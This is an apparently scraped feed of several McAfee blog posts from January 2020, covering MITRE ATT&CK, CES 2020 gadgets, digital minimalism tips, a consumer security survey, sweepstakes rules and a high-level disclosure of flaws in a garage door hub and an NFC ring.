MITRE describes ATT&CK™ as “a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations.”  While this is a fine definition, it helps to understand the significance this framework enables. The tactics, techniques, and procedures (TTPs) represented in ATT&CK allow organizations to understand how adversaries operate.  Once you have this understanding, you can […]

The post MITRE ATT&CK™, What’s the Big Idea? appeared first on McAfee Blogs.

]]>

MITRE describes ATT&CK™ as “a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations.”  While this is a fine definition, it helps to understand the significance this framework enables.

The tactics, techniques, and procedures (TTPs) represented in ATT&CK allow organizations to understand how adversaries operate.  Once you have this understanding, you can take measures to mitigate those risks.

So, in the end, ATT&CK is about risk management. 

                  Cycle of Mitigation

ATT&CK In Action

At the MITRE ATT&CKcon 2.0 conference, industry leaders from Nationwide presented on Using Threat Intelligence to Focus ATT&CK Activities.  They described the process of taking the larger ATT&CK Matrix and reducing it to a more contextual and manageable set of items they could action; to mitigate the most relevant vectors for their organization.

One great aspect of ATT&CK is that the data is available for all to see.  Leveraging the collective base of reports, we can build a prevalence view of the matrix.  As of January 2020, there were some 266 techniques, referenced across 449 actors and tools.

              MITRE ATT&CK™ Enterprise Treemap (October 2019)

Here we see that the Remote File Copy technique was used by 42% of the referenced actors and tools.  Indeed, this is an important and heavily used technique present in attacks carried out by various actors including APT3 and ATP38, as well as noteworthy malware attacks such as Shamoon and WannaCry, just to name a few.

MITRE ATT&CK Evaluation

In 2019, MITRE began evaluating security vendors using these techniques to measure their ability to See the activities of an adversary. The first evaluation, or Round 1, was based on an APT3 style attack, and included many of the items on the treemap above.  As you might expect, Remote File Copy was represented.  During the evaluation, MITRE copied a DLL to a remote system (something that the Petya malware does).  While several vendors were able to show telemetry for this action, thanks to MVISION EDR, McAfee was one of only two vendors that showed a Specific Behavior alert for this activity (see 7.B.1 on the technique comparison).  This designation reserved for the most descriptive of all detection categories.  (See Round 1 Detection Categories).  For more information on McAfee’s Round 1 results, see: MITRE ATT&CK™ APT3 Assessment

Putting It All Together

Having the necessary visibility into the actions taken by an attacker is a key component in understanding the risks an organization faces.  Armed with this information, a response can be carried out and a mitigation plan created and rolled out to thwart future attacks.

MITRE ATT&CK is a great advancement in enabling organizations to characterize and subsequently manage risk.

 

The post MITRE ATT&CK™, What’s the Big Idea? appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/endpoint-security/mitre-attck-whats-the-big-idea/feed/ 0
The Top Technology Takeaways From CES 2020 https://www.mcafee.com/blogs/consumer/takeaways-from-ces-2020/ https://www.mcafee.com/blogs/consumer/takeaways-from-ces-2020/#comments Tue, 14 Jan 2020 22:04:55 +0000 /blogs/?p=98088

Another Consumer Electronics Show (CES) has come and gone. Every year, this trade show joins practically everyone in the consumer electronics industry to show off the latest and greatest cutting-edge innovations in technology. From bendable tablets to 8k TVs and futuristic cars inspired by the movie “Avatar,” CES 2020 did not disappoint. Here are a […]

The post The Top Technology Takeaways From CES 2020 appeared first on McAfee Blogs.

]]>

Another Consumer Electronics Show (CES) has come and gone. Every year, this trade show joins practically everyone in the consumer electronics industry to show off the latest and greatest cutting-edge innovations in technology. From bendable tablets to 8k TVs and futuristic cars inspired by the movie “Avatar,” CES 2020 did not disappoint. Here are a few of the key takeaways from this year’s show:

Smart home technology is driven by convenience

As usual, smart home technology made up a solid portion of the new gadgets introduced at CES. Netatmo introduced the Netatmo Smart Door Lock and Keys which use physical NFC (meaning near field communication, a technology that allows devices to communicate with each other) keys as well as digital keys for guests. In the same realm of home security, Danby’s smart mailbox called the Parcel Guard allows couriers to deliver packages directly into the anti-theft box using a code or smartphone app.

Devices integrated with Alexa technology

CES 2020 also introduced many devices integrated with Alexa technology. Kohler debuted its Moxie showerhead, complete with an Alexa-enabled waterproof Bluetooth speaker. Along with the showerhead, Alexa was also built into a Dux Swedish luxury bed to help improve users’ bedtime routines.

Smart appliances

CES is usually graced with a handful of smart appliances, and this year was no different. Bosch partnered with the recipe and meal-planning app Chefling to showcase its high-tech Home Connect Refrigerator, which uses cameras to track which food items users have stocked and suggests recipes based on that information.

Mind-reading wearables translate thoughts into digital commands

CES featured several products that let users control apps, games, and devices with their minds. Companies have developed devices that can record brain signals from sensors on the scalp or devices implanted within the brain and translate them into digital signals. For example, NextMind has created a headset that measures activity in the visual cortex and translates the user’s decision of where to focus his or her eyes into digital commands. This technology could replace remote controls, as users would be able to change channels, mute, or pause just by focusing on triangles next to each command.

Another company focused on the brain-computer interface is BrainCo. This company debuted their FocusOne headband at CES this year, complete with sensors on the forehead measuring the activity in the frontal cortex. This device is designed to measure focus by detecting the subtle electrical signals that your brain is producing. These headbands are designed to help kids learn how to focus their minds in class. BrainCo also has a prosthetic arm coming to market later this year which detects muscle signals and feeds them through an algorithm that can help it operate better over time. What’s more, this device will cost less than half of an average prosthetic.

Foldable screens are still a work-in-progress

This year’s event was colored with folding screens. However, most of these devices were prototypes without proposed ship dates. A likely reason for the lack of confidence in these devices by their manufacturers is that they are unsure if the screens will be durable enough to sell. Some of these work-in-progress devices include Dell’s Concept Ori, Intel’s Horseshoe Bend, and Lenovo’s ThinkPad X1 Fold. Nevertheless, folding devices provide a new opportunity for manufacturers to play around with device forms, such as a phone that turns into a tablet.

Cybersecurity’s role in evolving technology

As consumer technology continues to evolve, the importance of securing these newfangled devices becomes more and more apparent. According to panelists from the CES session Top Security Trends in Smart Cities, by making products “smarter,” we are also making them more susceptible to hacking. For example, The McAfee Advanced Threat Research (ATR) team recently uncovered security flaws in multiple IoT smart home devices. The first is the Chamberlain MyQ Hub, a “universal” garage door automation platform that can be hacked to cause a user’s garage door to open unintentionally. The second is the McLear NFC Ring, a household access control device used to interact with NFC-enabled door locks, which can be cloned to gain access to a user’s home.

Keep cybersecurity a top priority

Although CES 2020 has introduced many new devices aimed at making users’ lives easier, it’s important to keep a secure home as a top priority as gadgets are brought into their lives. As new McAfee research has revealed, the majority of Americans today (63%) believe that they as the consumer are responsible for their security. This could likely be attributed to more Americans becoming aware of online risks, as 48% think it’s likely to happen to them. To feel confident bringing new technology into their homes, users are encouraged to proactively integrate online security into everyday life.

Need for increased cybersecurity protection

As the sun sets on another fabulous CES, it’s clear that technological innovations won’t be slowing down any time soon. With all of these new advancements and greater connectivity comes the need for increased protection when connected to the internet. All in all, CES 2020 showed us that as technology continues to improve and develop, security will play an ever-increasing role in protecting consumers online

Stay up to date

To stay on top of McAfee news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

The post The Top Technology Takeaways From CES 2020 appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/takeaways-from-ces-2020/feed/ 1
Less is More: 5 Ways to Jumpstart a ‘Digital Minimalist’ Mindset   https://www.mcafee.com/blogs/consumer/family-safety/less-is-more-5-ways-to-jumpstart-a-digital-minimalism-mindset/ https://www.mcafee.com/blogs/consumer/family-safety/less-is-more-5-ways-to-jumpstart-a-digital-minimalism-mindset/#comments Sat, 11 Jan 2020 17:58:48 +0000 /blogs/?p=98014 digital minimalism

Editor’s Note: This is part II of a series on Digital Minimalism in 2020. Is this the year you rethink and rebuild your relationship with technology? If so, embracing digital minimalism may be the most powerful way to achieve that goal. We learned last week in our first post on this series tht digital minimalism […]

The post Less is More: 5 Ways to Jumpstart a ‘Digital Minimalist’ Mindset   appeared first on McAfee Blogs.

]]>
digital minimalism

Editor’s Note: This is part II of a series on Digital Minimalism in 2020.

Is this the year you rethink and rebuild your relationship with technology? If so, embracing digital minimalism may be the most powerful way to achieve that goal.

We learned last week in our first post on this series tht digital minimalism isn’t about chucking your devices and going off the grid. It’s about being hyper intentional that your technology choices support the things you value.

And, as outlined by Cal Newport in his book, Digital Minimalism: Choosing a Focused Life in a Noisy World, the first step in the process is clarifying your values. Your values are the guiding principles that motivate you and give your life meaning such as family, education, work/life balance, community service, friendship, integrity, health, or wealth. With values clearly defined, you can evaluate every piece of technology, app, or social network you use to be sure it aligns with those values.

For instance, if you establish your top values to be family and volunteering, then maybe it’s time to let go of all the podcasts, apps, and email subscriptions that no longer support those priorities. The online social communities you habitually peruse may trigger anxiety and be taking time from activities that could be far more fulfilling.

If you get overwhelmed amid your technology pruning, come back to these two critical questions:

  • Does this technology directly support something that I deeply value?
  • Is this technology the best way to support this value?

digital minimalism

 

 

There’s a ton of great information as well as passion online around the concept of digital minimalism. But to keep this new idea “minimal” and easy to grasp, we’ve chosen 5 things you can do today to help you and your family jumpstart this new way of thinking.

5 ways to jumpstart a ‘digital minimalist’ mindset

  1. Make social accounts private. Last week we suggested cutting all non-essential media for 30 days. Another way to mentally shift into a minimalist mindset is to transition your social media accounts from public to private if you haven’t already. Not only will this small change increase your online privacy, but it could also help you become more aware of the amount of content you share, the people with whom you share it, and the value of what you share. For people who post frequently (and often out of habit), this may prove to be a game-changer. The goal of digital minimalism isn’t a digital detox or white-knuckling no-or-less-tech life. The goal is to consciously, willingly, and consistently be rebuilding your relationship with technology into a formula that decreases distraction and increases value.
  2. Audit those apps! Want to feel a rush of minimalist adrenaline? Whack some apps! Most of us have amassed a galaxy of apps on our phones, tablets, and laptops. Newport suggests getting rid of any apps or devices that continuously distract and are “outside of work.” Those brain games, cooking apps, calorie trackers, and delivery apps you rarely use or value, may no longer be relevant to your values. Some will find this exercise exhilarating, while others may feel panicked. If that’s the case, pace yourself and delete a handful of apps over the next few weeks. The goal is more peace, not panic. On a security note: Remember, apps are one of the main channels for malware. Consider adding security software to your family devices, reading app reviews, and only downloading trusted products.
  3. Reclaim your space. Do you carry your phone with you into restaurants, upstairs, on a walk, and even to the bathroom? If so, this step may be especially tricky but incredibly beneficial. Think about it — you weren’t born with a phone. Over the years, it became a companion, maybe even an extra appendage. So start small to reclaim your birthright to phone-free space. If you go outside to walk your dog, leave your phone inside. Are you headed into a restaurant? Leave the phone in the car. Newport also suggests leaving your phone in a fixed spot in your home and treating it like the “house phones” of the past. When you go to bed, leave your phone in another room. Over time, hopefully, these small changes will add more hours, sleep, relaxation, conversation, and contemplation to your day.
  4. Condense home screens, turn off all notifications. Clutter — especially digital clutter — can trigger feelings of chaos and anxiety. By creating folders for random files and apps on your laptop, tablet, and phone, you can declutter and breathe a little easier. If later you can’t find a document, use the search tool on your device. Also, turn off all notifications, including your phone ringer, to reduce interruptions and to avoid the temptation to phub (phone snub) the person in front of you.
  5. Replace device time with more productive activities. The pain and regret of the social media time suck are very real. We lose days, even years going down digital rabbit holes and getting emotionally invested in random social media posts and exchanges. Some ideas: If you are a night scroller, opt to read a physical book. If you take breaks to scroll during work hours, put your phone in a drawer — out of sight, out of mind. If you’ve defined “relaxing” as curling up with your coffee and phone and reading through social feeds, reclaim those hours by calling a friend, taking a walk, connecting with your family, reading, or getting outside.

Embracing a new mindset, especially when it comes to our sacred technology habits, won’t be an easy task. However, if you know (and yes, you do know) that technology is taking up too much of your time, attention, and emotional bandwidth, then 2020 may the perfect time to release digital distractions, rethink your technology choices, and reclaim the things that matter most.

The post Less is More: 5 Ways to Jumpstart a ‘Digital Minimalist’ Mindset   appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/family-safety/less-is-more-5-ways-to-jumpstart-a-digital-minimalism-mindset/feed/ 1
McAfee Research Reveals Americans’ Perceptions of Device Security Amidst CES 2020 https://www.mcafee.com/blogs/consumer/perceptions-of-device-security-ces-2020/ https://www.mcafee.com/blogs/consumer/perceptions-of-device-security-ces-2020/#respond Thu, 09 Jan 2020 08:01:18 +0000 /blogs/?p=97977

From the Lifx Switch smart switch to the Charmin RollBot to Kohler Setra Alexa-connected faucets, CES 2020 has introduced new devices aimed at making consumers lives easier. With so much excitement and hype around these new gadgets, however, it can be challenging to make security a top priority. That’s why McAfee is urging users to […]

The post McAfee Research Reveals Americans’ Perceptions of Device Security Amidst CES 2020 appeared first on McAfee Blogs.

]]>

From the Lifx Switch smart switch to the Charmin RollBot to Kohler Setra Alexa-connected faucets, CES 2020 has introduced new devices aimed at making consumers lives easier. With so much excitement and hype around these new gadgets, however, it can be challenging to make security a top priority. That’s why McAfee is urging users to keep cybersecurity top-of-mind when bringing these new devices into their home so they can protect what matters.

New McAfee research reveals that consumer perceptions of security accountability have shifted in the last couple of years. For example, the majority of Americans today (63%) stated that they as the consumer are responsible for their security while last year only 42% of Americans felt that they are responsible. This shows that users are becoming increasingly aware of how to ensure that they are protecting their privacy and identity. This year-over-year increase could likely be attributed to more Americans becoming aware of online risks, as 48% think it’s likely to happen to them. Additionally, 65% are concerned about the security of connected devices installed in their homes, such as the Chamberlain MyQ Hub garage door opener and the McLear Smart Ring. While these devices are convenient, the McAfee Advanced Threat Research team recently revealed they contained security flaws that could allow a hacker to enter a victim’s home.

It’s important to recognize that security is a proactive effort that should be seamlessly integrated into everyday life. So, how can consumers take charge and feel confident bringing new technology into their homes while staying safe? Check out the following tips to keep in mind as our lives continue to be more connected:

  • The little things count. Hackers don’t have to be geniuses to steal your personal information. Minor habits like changing default passwords and using unique passwords can go a long way to prevent your personal information from being stolen.
  • Do your research. Look up products and their manufacturers before making a purchase. This could save you from buying a device with a known security vulnerability. If you find a manufacturer doesn’t have a history of taking security seriously, then it’s best to avoid it.
  • Use a comprehensive security solution. Use comprehensive security protection, like McAfee Total Protection, which can help protect devices against malware, phishing attacks, and other threats. It also includes McAfee WebAdvisor, which can help identify malicious websites.
  • Update, update, update. When applications on your devices need updating, be sure to do it as soon as possible. Most of these updates include security patches to vulnerabilities.

To stay on top of McAfee’s CES news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

Survey Methodology

McAfee commissioned 3Gem to conduct a survey of 1,000 adults in the US who regularly use electronic devices, such as phones and laptops.

The post McAfee Research Reveals Americans’ Perceptions of Device Security Amidst CES 2020 appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/perceptions-of-device-security-ces-2020/feed/ 0
Iran Cyber Threat Update https://www.mcafee.com/blogs/other-blogs/mcafee-labs/iran-cyber-threat-update/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/iran-cyber-threat-update/#respond Wed, 08 Jan 2020 21:04:04 +0000 /blogs/?p=97971

Recent political tensions in the Middle East region have led to significant speculation of increased cyber-related activities. McAfee is on a heightened state of alert to monitor the evolving threats and rapidly implement coverage across all McAfee products as intelligence becomes available. Known campaigns associated with the threat actors from this region were integrated into […]

The post Iran Cyber Threat Update appeared first on McAfee Blogs.

]]>

Recent political tensions in the Middle East region have led to significant speculation of increased cyber-related activities. McAfee is on a heightened state of alert to monitor the evolving threats and rapidly implement coverage across all McAfee products as intelligence becomes available. Known campaigns associated with the threat actors from this region were integrated into our products and we continue to monitor our global telemetry for any further activity.

Current activity

We are observing activity that claim to be attributed from threat actors from this region, however, distinguishing attribution between cybercrime and nation state will be crucial since the line will likely blur. For example, typical cybercrime activities such as ransomware, or indeed defacements or DDoS, could well be a mask for nation-state activities.

The post Iran Cyber Threat Update appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/iran-cyber-threat-update/feed/ 0
Viva Las Vegas: Cash Out with the #McAfeeAtCES RT2Win Sweepstakes! https://www.mcafee.com/blogs/consumer/ces-2020-rt2win-sweepstakes/ https://www.mcafee.com/blogs/consumer/ces-2020-rt2win-sweepstakes/#respond Tue, 07 Jan 2020 15:55:59 +0000 /blogs/?p=97923

We’ve officially touched down in Las Vegas for CES 2020! If you aren’t familiar with CES, it is the global stage for innovators to showcase the next generation of consumer technologies, including IoT devices. Though these devices are convenient, they can also be cause for possible security concerns due to overlooked weaknesses. Check out the latest research […]

The post Viva Las Vegas: Cash Out with the #McAfeeAtCES RT2Win Sweepstakes! appeared first on McAfee Blogs.

]]>

We’ve officially touched down in Las Vegas for CES 2020!

If you aren’t familiar with CES, it is the global stage for innovators to showcase the next generation of consumer technologies, including IoT devices. Though these devices are convenient, they can also be cause for possible security concerns due to overlooked weaknesses. Check out the latest research from the McAfee Advanced Threat Research (ATR) team on device vulnerabilities for more information.

With the growing consumer technology landscape, we here at McAfee understand the importance of creating new solutions for those who want to live their connected lives with confidence.

In fact, to celebrate the latest innovations, we’re giving three [3] lucky people the chance to win an Amazon gift card. Not heading to CES this year Not heading to CES this year? No problem! Simply retweet one of our contest tweets with the required hashtag between January 7th – 9th for your chance to win. Follow the instructions below to enter, and good luck!


#RT2Win Sweepstakes Official Rules

  • To enter, go to https://twitter.com/McAfee_Home, and find the #RT2Win sweepstakes tweet.
  • There will be three [3] sweepstakes tweets will be released at the following schedule including the hashtags: #RT2Win, #Sweepstakes AND #McAfeeAtCES
    • Tuesday, January 7, 2020 at 7:00AM PST
    • Wednesday, January 8, 2020 at 7:00AM PST
    • Thursday, January 9, 2020 at 7:00AM PST
  • Retweet the sweepstakes tweet released on the above date before 11:59PM PST, from your own handle. The #RT2Win, #Sweepstakes AND #McAfeeAtCES hashtags must be included to be entered.
  • Sweepstakes will end on Thursday, January 9, 2020 at 11:59pm PT. All entries must be made before that date and time.
  • Winners will be notified on Wednesday, August 28, 2019 via Twitter direct message.
  • Limit one entry per person.
1. How to Win:

Retweet one of our contest tweets on @McAfee_Home that include “#RT2Win, #Sweepstakes, and #McAfeeAtCES” for a chance at an Amazon Gift card. Winners must be following @McAfee_Home for eligibility. One [1] winner will be selected per day, and notified by 10:00AM PT the following day, for a total of three [3] winners. Winners will be notified by direct message on Twitter. For full Sweepstakes details, please see the Terms and Conditions, below.

#McAfeeAtCES RT2Win CES Sweepstakes Terms and Conditions

2. How to Enter: 

No purchase necessary. A purchase will not increase your chances of winning. McAfee’s #RT2Win CES Sweepstakes will be conducted from January 7th through January 9th. All entries for each day of the #McAfeeAtCES RT2Win CES Sweepstakes must be received during the time allotted for the #RT2Win CES Sweepstakes. Pacific Daylight Time shall control the McAfee RT2Win CES Sweepstakes. The #McAfeeAtCES RT2Win Sweepstakes duration is as follows:

  • Begins: Tuesday, January 7, 2020 at 7:00am PST
  • Ends: Thursday, January 9, 2020 at 11:59 PST
    • Opportunity 1: Tuesday, January 7, 2020 at 7:00AM PST
    • Opportunity 2: Wednesday, January 8, 2020 at 7:00AM PST
    • Opportunity 3: Thursday, January 9, 2020 at 7:00AM PST
  • Winners will be announced: by 10:00AM PST the following day

For the #McAfeeAtCES RT2Win Sweepstakes, participants must complete the following steps during the time allotted for the #McAfeeAtCES RT2Win Sweepstakes:

  1. Find the sweepstakes tweet of the day posted on @McAfee_Home which will include the hashtags: #McAfeeAtCES, #RT2Win and #Sweepstakes.
  2. Retweet the sweepstakes tweet of the day and make sure it includes the #McAfeeAtCES, #RT2Win and #Sweepstakes hashtags.
    1. Note: Tweets that do not contain the #McAfeeAtCES, #RT2Win and #Sweepstakes hashtags will not be considered for entry.
  3. Limit one entry per person.

Three [3] winners will be chosen for the #McAfeeAtCES RT2Win CES Sweepstakes tweet from the viable pool of entries that retweeted and included #McAfeeCES Sweepstakes. McAfee and the McAfee social team will select winners at random from among the viable entries. The winners will be announced and privately messaged on January 10th on the @McAfee_Home Twitter handle. No other method of entry will be accepted besides Twitter. Only one entry per user is allowed, per Sweepstakes. SWEEPSTAKES IS IN NO WAY SPONSORED, ENDORSED, ADMINISTERED BY, OR ASSOCIATED WITH TWITTER, INC.

3. Eligibility: 

McAfee’s #RT2Win CES Sweepstakes is open to all legal residents of the 50 United States who are 18 years of age or older on the dates of the #McAfeeAtCES RT2Win CES Sweepstakes begins and live in a jurisdiction where this prize and #McAfeeAtCES RT2Win CES Sweepstakes are not prohibited. Employees of Sponsor and its subsidiaries, affiliates, prize suppliers, and advertising and promotional agencies, their immediate families (spouses, parents, children, and siblings and their spouses), and individuals living in the same household as such employees are ineligible.

4. Winner Selection:

Winners will be selected from the eligible entries received during the days of the #McAfeeAtCES RT2Win CES Sweepstakes periods. Sponsor will select the names of three [3] potential winners of the prizes in a random drawing from among all eligible

Submissions at the address listed below. The odds of winning depend on the number of eligible entries received. By participating, entrants agree to be bound by the Official #McAfeeAtCES RT2Win CES Sweepstakes Rules and the decisions of the coordinators, which shall be final and binding in all respects.

5. Winner Notification: 

Each winner will be notified via direct message (“DM”) on Twitter.com by January 10, 2020. Prize winners may be required to sign an Affidavit of Eligibility and Liability/Publicity Release (where permitted by law) to be returned within ten (10) days of written notification, or prize may be forfeited and an alternate winner selected. If a prize notification is returned as unclaimed or undeliverable to a potential winner if potential winner cannot be reached within twenty-four (24) hours from the first DM notification attempt, or if potential winner fails to return requisite document within the specified time period, or if a potential winner is not in compliance with these Official Rules, then such person shall be disqualified and, at Sponsor’s sole discretion, an alternate winner may be selected for the prize at issue based on the winner selection process described above.

6. Prizes: 

The prizes for the #McAfeeAtCES RT2Win CES Sweepstakes are two [2] $100 Amazon e-gift cards and a one [1] $200 Amazon e-gift card (approximate retail value “ARV” of the prize is $100 and $200 USD; the total ARV of all gift cards is $400 USD). Entrants agree that Sponsor has the sole right to determine the winners of the #McAfeeAtCES RT2Win CES Sweepstakes and all matters or disputes arising from the #McAfeeAtCES RT2Win CES Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor. Sponsor will not replace any lost or stolen prizes. Sponsor is not responsible for delays in prize delivery beyond its control. All other expenses and items not specifically mentioned in these Official Rules are not included and are the prize winners’ sole responsibility.

7. General Conditions: 

Entrants agree that by entering they agree to be bound by these rules. All federal, state, and local taxes, fees, and surcharges on prize packages are the sole responsibility of the prizewinner. Sponsor is not responsible for incorrect or inaccurate entry information, whether caused by any of the equipment or programming associated with or utilized in the #McAfeeAtCES RT2Win CES Sweepstakes, or by any technical or human error, which may occur in the processing of the #McAfeeAtCES RT2Win CES Sweepstakes entries. By entering, participants release and hold harmless Sponsor and its respective parents, subsidiaries, affiliates, directors, officers, employees, attorneys, agents, and representatives from any and all liability for any injuries, loss, claim, action, demand, or damage of any kind arising from or in connection with the #McAfeeAtCES RT2Win CES Sweepstakes, any prize won, any misuse or malfunction of any prize awarded, participation in any #McAfeeAtCES RT2Win CES Sweepstakes -related activity, or participation in the #McAfeeAtCES RT2Win CES Sweepstakes. Except for applicable manufacturer’s standard warranties, the prizes are awarded “AS IS” and WITHOUT WARRANTY OF ANY KIND, express or implied (including any implied warranty of merchantability or fitness for a particular purpose).

If participating in this Sweepstakes via your mobile device (which service may only be available via select devices and participating wireless carriers and is not required to enter), you may be charged for standard data use from your mobile device according to the terms in your wireless service provider’s data plan.  Normal airtime and carrier charges and other charges may apply to data use and will be billed on your wireless device bill or deducted from your pre-paid balance.  Wireless carrier rates vary, so you should contact your wireless carrier for information on your specific data plan.

8. Limitations of Liability; Releases:

By entering the Sweepstakes, you release Sponsor and all Released Parties from any liability whatsoever, and waive any and all causes of action, related to any claims, costs, injuries, losses, or damages of any kind arising out of or in connection with the Sweepstakes or delivery, misdelivery, acceptance, possession, use of or inability to use any prize (including claims, costs, injuries, losses and damages related to rights of publicity or privacy, defamation or portrayal in a false light, whether intentional or unintentional), whether under a theory of contract, tort (including negligence), warranty or other theory.

To the fullest extent permitted by applicable law, in no event will the sponsor or the released parties be liable for any special, indirect, incidental, or consequential damages, including loss of use, loss of profits or loss of data, whether in an action in contract, tort (including, negligence) or otherwise, arising out of or in any way connected to your participation in the sweepstakes or use or inability to use any equipment provided for use in the sweepstakes or any prize, even if a released party has been advised of the possibility of such damages.

  1. To the fullest extent permitted by applicable law, in no event will the aggregate liability of the released parties (jointly) arising out of or relating to your participation in the sweepstakes or use of or inability to use any equipment provided for use in the sweepstakes or any prize exceed $10. The limitations set forth in this section will not exclude or limit liability for personal injury or property damage caused by products rented from the sponsor, or for the released parties’ gross negligence, intentional misconduct, or for fraud.
  2. Use of Use of Winner’s Name, Likeness, etc.: Except where prohibited by law, entry into the Sweepstakes constitutes permission to use your name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation (including in a public-facing winner list).  As a condition of being awarded any prize, except where prohibited by law, winner may be required to execute a consent to the use of their name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation. By entering this Sweepstakes, you consent to being contacted by Sponsor for any purpose in connection with this Sweepstakes.

 9. Prize Forfeiture:

If winner cannot be notified, does not respond to notification, does not meet eligibility requirements, or otherwise does not comply with these prize #McAfeeAtCES RT2Win CES Sweepstakes rules, then the winner will forfeit the prize and an alternate winner will be selected from remaining eligible entry forms for each #McAfeeAtCES RT2Win CES Sweepstakes.

10. Dispute Resolution:

Entrants agree that Sponsor has the sole right to determine the winners of the #McAfeeAtCES RT2Win CES Sweepstakes and all matters or disputes arising from the #McAfeeAtCES RT2Win CES Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

11. Governing Law & Disputes:

Each entrant agrees that any disputes, claims, and causes of action arising out of or connected with this sweepstakes or any prize awarded will be resolved individually, without resort to any form of class action and these rules will be construed in accordance with the laws, jurisdiction, and venue of New York.

12. Privacy Policy: 

Personal information obtained in connection with this prize McAfee Day #RT2Win CES Sweepstakes will be handled in accordance policy set forth at http://www.mcafee.com/us/about/privacy.html

  1. Winner List; Rules Request: For a copy of the winner list, send a stamped, self-addressed, business-size envelope for arrival after January 10th 2020 and before January 10th 2021 to the address listed below, Attn: #RT2Win at CES Sweepstakes.  To obtain a copy of these Official Rules, visit this link or send a stamped, self-addressed business-size envelope to the address listed in below, Attn: Sarah Grayson. VT residents may omit return postage.
  2. Intellectual Property Notice: McAfee and the McAfee logo are registered trademarks of McAfee, LLC. The Sweepstakes and all accompanying materials are copyright © 2018 by McAfee, LLC.  All rights reserved.
  3. Sponsor: McAfee, LLC, Corporate Headquarters 2821 Mission College Blvd. Santa Clara, CA 95054 USA
  4. Administrator: LEWIS, 111 Sutter St., Suite 850, San Francisco, CA 94104

The post Viva Las Vegas: Cash Out with the #McAfeeAtCES RT2Win Sweepstakes! appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/ces-2020-rt2win-sweepstakes/feed/ 0
What You Need to Know About the Latest IoT Device Flaws https://www.mcafee.com/blogs/consumer/ces-2020-atr-iot-device-flaws/ https://www.mcafee.com/blogs/consumer/ces-2020-atr-iot-device-flaws/#respond Tue, 07 Jan 2020 05:01:58 +0000 /blogs/?p=97921

The McAfee Advanced Threat Research (ATR) team recently uncovered a security flaw in a popular connected garage door opener and a security design issue in an NFC (meaning near field communication, which is a technology that allows devices to communicate with each other) smart ring used to unlock doors. As we head into CES 2020, […]

The post What You Need to Know About the Latest IoT Device Flaws appeared first on McAfee Blogs.

]]>

The McAfee Advanced Threat Research (ATR) team recently uncovered a security flaw in a popular connected garage door opener and a security design issue in an NFC (meaning near field communication, which is a technology that allows devices to communicate with each other) smart ring used to unlock doors. As we head into CES 2020, the global stage where innovators showcase the next generation of consumer technologies, let’s take a look at these new security flaws and discover how users can connect securely and with confidence.

Review Chamberlain IoT device

The McAfee ATR team recently investigated the Chamberlain MyQ Hub, a “universal” garage door automation platform. The Hub acts as a new garage door opener, similar to the one that you would have in your car. However, the McAfee ATR team discovered an inherent flaw in the way the MyQ Hub communicates over radio frequency signals. It turns out that hackers can “jam” the radio frequency signals while the garage is being remotely closed. How? By jamming or blocking the code signal from ever making it to the Hub receiver, the remote sensor will never respond with the closed signal. This delivers an error message to the user, prompting them to attempt to close the door again through the app, which actually causes the garage door to open.

How can the Chamberlain IoT device be hacked?

Let’s break it down:

  • Many users enjoy using the MyQ Hub for the convenience of package delivery, ensuring that their packages are safe from porch pirates and placed directly in the garage by the carrier=.
  • However, an attacker could wait for a package delivery using the connected garage door opener. The hacker could then jam the MyQ signal once the carrier opens the door and prompt an error message for the user. If and when the user attempts to close the door, the door will open and grant the attacker access to the home.
  • An attacker could also wait and see when a homeowner physically leaves the premises to jam the MyQ signal and prompt the error message. This would potentially allow further access into the home.

Review McLear NFC Ring IoT device

The McAfee ATR team also discovered an insecure design with the McLear NFC Ring, a household access control device that can be used to interact with NFC-enabled door locks. Once the NFC Ring has been paired with an NFC-enabled door lock, the user can access their house by simply placing the NFC Ring within the NFC range of the door lock instead of using a traditional house key. However, due to an insecure design, hackers could easily clone the ring and gain access to a user’s home.

How can the McLear NFC Ring be hacked?

  • First, the attacker can do some basic research on the victim, such as finding a social media post about how excited they are to use their new McLear NFC Ring.
  • Now, say the attacker locates the victim in a public setting and asks them to take a picture of them on the attacker’s phone. The attacker’s phone, equipped with an app to read NFC tags, can record the relevant information without giving any signs of foul play.
  • The McLear NFC Ring is now compromised, and the information can be programmed on a standard writable card, which can be used to unlock smart home locks that partner with the product.

How to keep your IoT devices safe from hacking

In the era of IoT devices, the balance between cybersecurity and convenience is an important factor to get right. According to Steve Povolny, head of McAfee Advanced Threat Research, “the numerous benefits technology enhancements bring us are exciting and often highly valuable; but many people are unaware of the lengths hackers will go and the many ways new features can impact the security of a system.” To help safeguard your security while still enjoying the benefits of your connected devices, check out the following tips:

  • Practice proper online security habits. Fortunately, users have many tools at their disposal, even when cybersecurity concerns do manifest. Implement a strong password policy, put IoT devices on their own, separate network, utilize dual-factor authentication when possible, minimize redundant systems, and patch quickly when issues are found.
  • Do your research. Before purchasing a new IoT device, take the time to look into its security features. Users should ensure they are aware of the security risks associated with IoT products available on the market.

Stay up to date

To stay on top of McAfee’s CES news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post What You Need to Know About the Latest IoT Device Flaws appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/ces-2020-atr-iot-device-flaws/feed/ 0
